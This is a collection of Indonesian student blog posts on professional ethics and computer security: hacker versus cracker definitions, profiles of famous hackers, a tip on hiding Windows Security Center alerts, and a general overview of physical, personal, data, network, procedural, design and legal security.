Kapan istilah hacker menjadi trend sebagai sebuah kejahatan yang menakutkan? Tidak lain karena "dosa" pakar film di hollywood yang membiaskan istilah hacker dan cracker ini. Banyak film yang mengangkat tema hacker dalam sebuah bentuk "penghancuran sistem informasi " yang seharusnya makna itu diterapkan pada seorang cracker.

Sebut misalnya film the Net (1995), Take Down(1999). Film tersebut mengangkat tema hacker untuk menyebut cracker.

Dan dari kesalah penafsiran tadi, hingga kini pun istilah hacker masih dibiaskan dengan istilah cracker. Kerancuan itu tidak hanya terjadi di Indonesia saja, bahkan di luar negeripun pandangan terhadap keduanya sama seperti itu.

Terminologi hacker muncul pada awal tahun 1960-an diantara anggota organisasi mahasiswa Tech Model Railroad club di Lab Kecerdasan Artifisial Masschusetts Institute Of Teknology (MIT). Istilah hacker awalnya bermakna positif untukmenyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat progranm komputer dengan lebih baik ketimbang yang ada sebelumnya (Memahmi karakteristik Komunitas Hacker: Studi Kasus pada Komunitas Hacker Indonesia, Donny B.U, M.Si)

MENJADI HACKER

Mungkin sekilas tentang definisi di atas cukup untuk membatasi sejauhmana peranan seorang hacker dan cracker itu. Tulisan ini tidak akan mengangkat sejarah hacker dan awal mula kerancuannya. Namun lebih menitik beratkan pada bagaimana seandainya kita belajar menjadi hacker. Atau lebih spesifik, bisakah kita menjadi seorang hacker?

Dalam tulisan How to Become a Hacker, Eric Steven Raymon mengatakan bahwa menjadi hacker tidaklah segampang yang dikira. Langkah awal untuk menjadi seorang hacker haruslah menguasai minimal 5 bahasa pemrograman yang ada. Ia menyebut bahasa pemrograman C/C++, Java, Perl, Phyton & LISP. Selain itu mampu berinteraksi dengan program HTML untuk dapat membangun komunikasi dengan jaringan internet. Semua dasar diatas adalah ilmu yang "wajib" dimiliki jika kita memang berminat untuk menjadi seorang hacker sejati. Karena pada dasarnya menjadi Hacker adalah penguasaan terhadap membaca dan menulis kode.

Kenapa kode? Karena memang komputer yang kita jalankan setiap hari pada intinya adalah terdiri dari berbagai kode instruksi yang cukup rumit.

Selain penguasaan terhadap bahasa pemrograman diatas, kita pun harus punya bekal yang cukup dalam berbahasa inggris untuk dapat saling bertukar pikiran dengan komunitas hacker dari seluruh dunia. Ini tidak dilarang karena pada umumnya, mereka (anggota komunitas tersebut) memiliki kode etik tersendiri tentang open-source atau kode-kode program yang boleh dibuka dan diutak atik oleh orang lain. Contoh, kode-kode Linux yang marak di perkenalkan baru-baru ini memiliki konsep open source dan karenanya bisa dimiliki oleh khalayak ramai dengan sebutan free software.

Kembali pada persoalan diatas, menjadi seorang hacker untuk tujuan saling berbagi ilmu dalam teknologi informasi ini, atau dalam arti yang lebih luas untuk memudahkan pemakai komputer pada masa yang akan datang, bukanlah hal harus ditakuti. Sebaliknya, ilmu tersebut harus diterjemahkan dan sama-sama digali sehingga menjadi bagian terintegral dalam memahami lika-liku dunia cyber. Asal saja kita tidak terjebak pada prilaku yang negatif sehingga menjadi seorang cracker yang membobol sitem rahasia orang lain.

AWAL SEBUAH PERJUANGAN

Ketika kita meniatkan diri untuk lebih akrab dengan dunia hacker, maka selain beberapa bekal yang disebutkan diatas, penguasaan bahasa pemrograman, html dan bahasa inggris, nampaknya niat tersebut harus juga dilengkapi dengan satu sikap mendasar tentang orientasi dan tujuan awal kita menjadi seorang hacker. Alih-alih menjadi seorang pakar pemrograman yang baik, jika tidak benar malah bisa terjebak pada prilaku negativ yang tidak hanya merugikan orang lain tapi merugikan diri sendiri. Konon, jika seandainya saja anda menjadi seorang cracker dan anda dikenal suka membuka rahasia orang lain, maka, jangan harap anda dapat dengan mudah berjalan-jalan kemanca negara. Karena, kata beberapa sumber, nama anda sudah di "black list" sebagai penjahat cyber?

Di sisi ini menarik untuk di simak, satu sisi, kita butuh teknologi canggih yang kerap bermunculan dalam hitungan detik, sisi lain ada kehawatiran takut terjebak pada pola "nyeleneh" yang berakibat patal. Namun demikian, sebagai satu sikap, kita berpijak pada satu kesepakatan, bahwa mempelajari bahasa-bahasa yang ditawarkan oleh Eric Steven Raymon diatas, adalah hal yang baik. Karena dengan mempelajarinya, kita minimal dapat mendapat solusi untuk membuat program yang berguna bagi orang lain. Dan jika ini dilakukan, percayalah, anda adalah seorang hacker.

Sopi Priatna, pengajar komputer di SMK Negeri 8 Bandung


Read More..

Menghilangkan Windows Security alert

by Tugas Etika Profesi | 09.52 in | komentar (0)

Windows security alert, meskipun kecil tapi cukup mengganggu. Apalagi bila balonnya selalu muncul, pasti cukup menyita perhatian. Supaya tidak lagi mengganggu saat bekerja, sembunyikan saja dari notifications bar.










Caranya sebagai berikut.

* Buka Security Center di Control Panel.
















* Klik Change the way Security Center alerts me.
















* Hilangkan semua ceklis lalu klik OK.













Security alert langsung hilang.



Read More..

14 Hacker Terbaik Dunia

by Tugas Etika Profesi | 09.39 in | komentar (0)

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.
Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.
Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds

Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.
Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.
Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper

Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris

Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.

7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

8. Ian Murphy

Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.
Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

9. Vladimir Levin

Lulusan St. Petersburg Tekhnologichesky University.
Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.
Ditangkap Interpol di Heathrow Airport pada tahun 1995

10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.

11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.

12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik danmenanti untuk dipecahkan”.

14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.

Read More..

Hacker Sebagai Penguji Sistem Keamanan

Oleh : Peter L & Ronny S


PENDAHULUAN

Dalam membangun sebuah sistem jaringan berbasis internet, masalah keamanan menjadi suatu hal yang mutlak diperlukan. Sistem yang dibangun tanpa adanya sistem keamanan yang baik sama halnya dengan mengajak pencuri untuk masuk ke rumah kita dan membiarkan dia mengambil segala sesuatu yang kita miliki.

Seringkali ketika membangun sebuah sistem, kita menemukan berbagai kerawanan dalam sistem kita. Namun hal itu kita anggap sebagai hal kecil karena kita tidak menganggapnya sebagai lubang keamanan (hole). Kita tidak sadar bahwa kerawanan-kerawanan kecil seperti inilah yang dimanfaatkan oleh orang-orang yang tidak bertanggungjawab untuk menjalankan aksi kejahatannya.

HACKER VS CRACKER

Dua istilah ini paling sering disebutkan ketika kita berbicara mengenai keamanan data. Hacker dan cracker dianggap sebagai orang yang bertanggung jawab atas berbagai kasus kejahatan komputer (cybercrime) yang semakin marak dewasa ini. Padahal jika kita mau melihat siapa dan apa yang dilakukan oleh hacker dan cracker, maka anggapan tersebut bisa dikatakan tidak 100 % benar.

Hacker adalah sebutan untuk mereka yang menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Hasil pekerjaan mereka biasanya dipublikasikan secara luas dengan harapan sistem atau software yang didapati memiliki kelemahan dalam hal keamanan dapat disempurnakan di masa yang akan datang. Sedangkan cracker memanfaatkan kelemahan-kelamahan pada sebuah sistem atau software untuk melakukan tindak kejahatan.

Dalam masyarakat hacker, dikenal hirarki atau tingkatan. Hacker menduduki tempat kedua dalam tingkatan tersebut dan cracker berada pada tingkat ketiga. Selain itu masih ada beberapa tingkatan lain seperti lamer (wanna be). Berbeda dengan hacker dan craker yang mencari dan menemukan sendiri kelemahan sebuah sistem, seorang lamer menggunakan hasil temuan itu untuk melakukan tindak kejahatan. Seorang lamer biasanya hanya memiliki pengetahuan yang sedikit mengenai komputer terutama mengenai sistem keamanan dan pemrograman. Dalam komunitas hacker, lamer merupakan sebutan yang bisa dibilang memalukan.

Seorang hacker memiliki tujuan yaitu untuk menyempurnakan sebuah sistem sedangkan seorang cracker lebih bersifat destruktif. Umumnya cracker melakukan cracking untuk menggunakan sumber daya di sebuah sistem untuk kepentingan sendiri.



MENGUJI KEAMANAN SISTEM

Berbicara mengenai keamanan dalam sebuah sistem komputer, tak akan lepas dari bagaimana seorang cracker dapat melakukan penetrasi ke dalam sistem dan melakukan pengrusakan. Ada banyak cara yang biasanya digunakan untuk melakukan penetrasi antara lain : IP Spoofing (Pemalsuan alamat IP), FTP Attack, Unix Finger Exploit, Flooding, Email Exploitsm Password Attacks, Remote File Sisem Attacks, dll.

Pada umumnya, cara-cara tersebut bertujuan untuk membuat server dalam sebuah sistem menjadi sangat sibuk dan bekerja di atas batas kemampuannya sehingga sistem akan menjadi lemah dan mudah dicrack.

Seorang hacker bisa dipekerjakan untuk mencari celah-celah (hole) dalam sebuah sistem keamanan. Hacker akan menggunakan berbagai teknik yang diketahuinya termasuk teknik-teknik di atas untuk melakukan penetrasi ke dalam sistem. Hacker juga akan mengkombinasikan berbagai cara di atas dan menggunakan berbagai teknik terbaru yang lebih canggih. Dengan demikian diharapkan titik rawan dalam sebuah sistem dapat diketahui untuk kemudian dilakukan perbaikan. Setelah perbaikan dilakukan (dengan melibatkan sang hacker), sistem akan kembali diuji. Demikianlah proses ini dilakukan berulang-ulang sehingga semua celah yang ada dalam sistem kemanan bisa ditutup.

Untuk melakukan proses ini, tentunya dibutuhkan seorang hacker yang benar-benar berpengalaman dan memiliki tingkat pengetahuan yang tinggi. Tidak semua hacker bisa melakukan hal ini dengan baik, apalagi jika kita memakai seorang cracker.



PENUTUP

Seorang hacker kini bisa memainkan peran sebagai konsultan keamanan bagi para vendor ataupun developer software maupun bagi perusahan-perusahaan yang menggunakan sistem komputer sebagai tulang punggung berjalannya kegiatan perusahaan. Dengan perannya ini, hacker diharapakan bisa membuat sebuah sistem ataupun sebuah software tetap survive dan tidak mengalami kehancuran akibat tindak kejahatan komputer yang dilakukan oleh para cracker.

Menjadi hacker adalah sebuah kebaikan tetapi menjadi seorang cracker adalah sebuah kejahatan.

Sumber : http://students.ukdw.ac.id/~22033120/hacker.html

Read More..

Amankah System Kita ?

by Tugas Etika Profesi | 06.49 in | komentar (0)

Menarik untuk menyimak berbagai artikel tentang keamanan sistem informasi dan komunikasi. Telah banyak artikel yang dimuat tentang keamanan ini di banyak media. Tetapi sudahkah kita menerapkan sistem keamanan yang tepat untuk mengamankan sistem informasi dan komunikasi kita?

Ada banyak aspek yang perlu dipertimbangkan untuk menilai "Amankah Sistem Kita?" Berikut ini adalah beberapa aspek tersebut.

Keamanan Fisik. Amankah hardware kita? Perlu dipikirkan bahwa komputer server atau desktop kita adalah pintu untuk masuk-ke dan keluar-dari sistem informasi kita. Bayangkan kalau seseorang yang tidak berhak tiba-tiba berada di depan komputer server. Entah apa yang terlintas dalam benaknya dan apa yang dapat dia lakukan terhadap server tersebut. Bagaimana kalau dia iseng? Atau memang ada niat jahat? Kalau sekedar memadamkan server sih masih mending. Tetapi kalau sudah sampai membawa lari server tersebut? Yang jelas, harus diperhatikan keamanan hardware sistem informasi kita. Keamanan secara fisik umumnya diberikan pada komputer server. Tetapi tidak menutup kemungkinan juga diterapkan pada komputer client/workstation. Misalnya diberikan ruang khusus dengan kondisi ruang yang terjaga (misalnya suhunya, kelembabannya, penerangan, dll), penerapan sistem keamanan (dengan sensor gerak, sensor cahaya, dll), sistem pemadam kebakaran yang canggih (Bukan dengan air, bisa korslet! Tetapi dengan memvakumkan atau menghampa-udarakan ruangan), dll.

Keamanan Personal. Dalam sebuah buku yang dikarang oleh seorang hacker, ternyata salah satu cara agar hacker tersebut dapat menembus keamanan sistem informasi dan komunikasi adalah dengan pendekatan personal atau sosialisasi yang baik dengan karyawan/operator pengguna sistem. Ada metode pendekatan sang hacker/cracker agar dapat memperoleh cara (biasanya berupa prosedur dan password) dari "orang-dalam" dari pengguna sistem. Bisa saja hacker tersebut dekat dengan wanita operator sebuah sistem, dan si hacker tadi berhasil mengorek password sistem. Atau juga ada hacker yang berpura-pura sebagai karyawan suatu perusahaan dan meminta System Administrator untuk mengubah password seorang operator. Dengan demikian hacker tersebut dapat memperoleh password dari operator tadi. Banyak cara yang dilakukan oleh hacker dan cracker untuk membobol sistem dari pendekatan personal, baik dengan cara halus, cara cantik, mau pun cara paksa (ih... serem!).

Keamanan Data. Data adalah bagian yang vital. Perlu pengamanan ekstra. Suatu sistem yang hanya dapat mengumpulkan/mencatat data ditambah kemampuan untuk menganalisa dan memprosesnya menjadi informasi adalah sebuah sistem yang lugu. Perlu ditambahkan prosedur kemanan untuk data tersebut, yaitu prosedur backup atau replikasi. Backup data ini sendiri perlu sehingga bila terjadi hal-hal yang mengganggu atau pun merusak sistem, kita masih memiliki data yang tersimpan di tempat dan di media lain yang aman. Gangguan dan perusakan terhadap data ini bisa terjadi karena banyak hal, misalnya: virus/worm, bencana alam dan buatan, terorisme, cracker/hacker, dll. Betapa pentingnya masalah keamanan data ini sampai menjadi bisnis di bidang TIK (teknologi informasi dan komunikasi) yang berdiri sendiri. Misalnya adalah datawarehouse, asuransi keamanan data, anti-virus, dll. Lugukah sistem informasi Anda?

Keamanan Komunikasi Jaringan. Keamanan komunikasi jaringan juga masalah yang penting. Apalagi sekarang teknologi wireless sedang marak-maraknya. Pada saat teknologi wireless masih baru lahir, banyak pakar dan praktisi TIK menilai penggunaan jaringan wireless merupakan jaringan yang paling rentan terhadap gangguan dan perusakan. Betulkah demikian? Sebuah majalah di Indonesia bahkan menguraikan cara-cara "menyantol" jaringan wireless ini. Terlepas dari itu semua, keamanan jaringan komunikasi ini juga sangat vital. Bentuknya bisa penyusupan ke jaringan, gangguan jaringan (flooding), atau bahkan perusakan sarana dan prasarana komunikasi jaringan (vandalism).

Keamanan Prosedur Operasi. Jelas harus ada aturan baku untuk prosedur operasional suatu sistem. Perlu ditingkatkan keamanan untuk prosedur operasional. Contoh gampangnya adalah: seorang operator harus logout (setelah login tentunya) jika akan meninggalkan komputernya, walau pun cuma untuk ke toilet. Mengapa bisa begitu? Karena ketika seorang operator meninggalkan komputernya dalam keadaan tidak logout, maka seseorang mungkin akan menggunakan komputernya untuk melakukan apa saja (misalnya transaksi) atas nama operator tadi. Bayangkan kalau operator yang ke toilet tadi ternyata seorang teller dari sebuah bank, mungkin saja seseorang melakukan transaksi untuk mentransfer sejumlah uang atas nama operator tadi. Bisa berabe tuh!

Keamanan Desain Sistem
. Yang dimaksud keamanan desain di sini adalah bagaimana desain sistem teknologi informasi dan komunikasi kita dapat menjaga hal-hal yang tidak diinginkan, misalnya penyusup/pengganggu dan perusak. Keamanan desain ini dapat berupa desain software aplikasi, sistem operasi, hardware, jaringan, dll. Di sini lebih ditekankan pada aspek desainnya. Sebagai contoh misalnya untuk keamanan desain software aplikasi: Aplikasi yang baik, terutama bila aplikasi tersebut multi-user, maka perlu ada autentikasi user yang login dan dicatat dalam file log untuk penelusuran kelak. Sekarang tidak hanya fasilitas login-logout ini saja, tetapi aplikasi harus lebih pintar, misalnya dengan penambahan pewaktu (timer) yang akan menghitung waktu idle (menganggur) aplikasi. Jika melewati batas waktu tertentu, maka otomatis aplikasi akan menjalankan proses logout. Berjalannya waktu, proses login-logout ini sendiri tidak melulu menggunakan nama login dan password atau dengan kartu magnetik biasa, tetapi sudah memanfaatkan teknologi biometrik. Misalnya dengan sidik jari, sidik telapak tangan, pengenalan retina, pengenalan suara, dll. Mungkin saja kelak untuk mengambil uang di ATM kita tidak menggunakan kartu magnetik tetapi hanya dengan sidik jari/tangan kita.

Keamanan Hukum. Isu keamanan hukum menjadi marak sejak diberlakukannya UU HAKI (Hak Atas Kekayaan Intelektual) di Indonesia. Terkuak sudah banyaknya pelanggaran hukum atas penggunaan produk-produk bajakan. Sudah amankah sistem teknologi informasi dan komunikasi Anda? Jangan sampai perusahaan dibreidel gara-gara menggunakan software bajakan! Tetapi bukan ini saja masalah keamanan hukum. Ada sisi lain, yaitu: Anda dapat memetik manfaat dari adanya hukum yang mengatur teknologi informasi dan komunikasi. Misalnya saja jika Anda sebagai pengembang software, Anda akan sangat merasa terlindungi jika hasil karya Anda dilindungi oleh hukum. Demikian juga pengakuan publik atas kekayaan intelektual Anda. Sebagai contoh lain, mungkin perusahaan Anda menggunakan vendor yang memasok sistem teknologi informasi dan komunikasi perusahaan Anda. Buat dan gunakan kontrak atau perjanjian kerja yang melindungi perusahaan Anda. Dengan adanya kontrak atau perjanjian ini, maka hal-hal yang sekiranya mengganggu dan merugikan yang kelak timbul di kemudian hari dan telah tercakup dalam kontrak/perjanjian, dapat menjadi pijakan yang kuat bagi Anda dalam menuntut vendor tersebut.

Demikian artikel sekilas Keamanan Teknologi Informasi dan Komunikasi. Memang belum dibahas secara detail masing-masing point, tetapi penjelasan detail diupayakan akan dijabarkan dalam artikel lain di kesempatan berikutnya. Semoga dapat berguna dan menjadi wawasan yang membangun. Sudah amankah sistem informasi dan komunikasi Anda?

Sumber : http://students.ukdw.ac.id/~22033120/amankah.html

Read More..

Blog Archive

ShoutBox

Komen Baru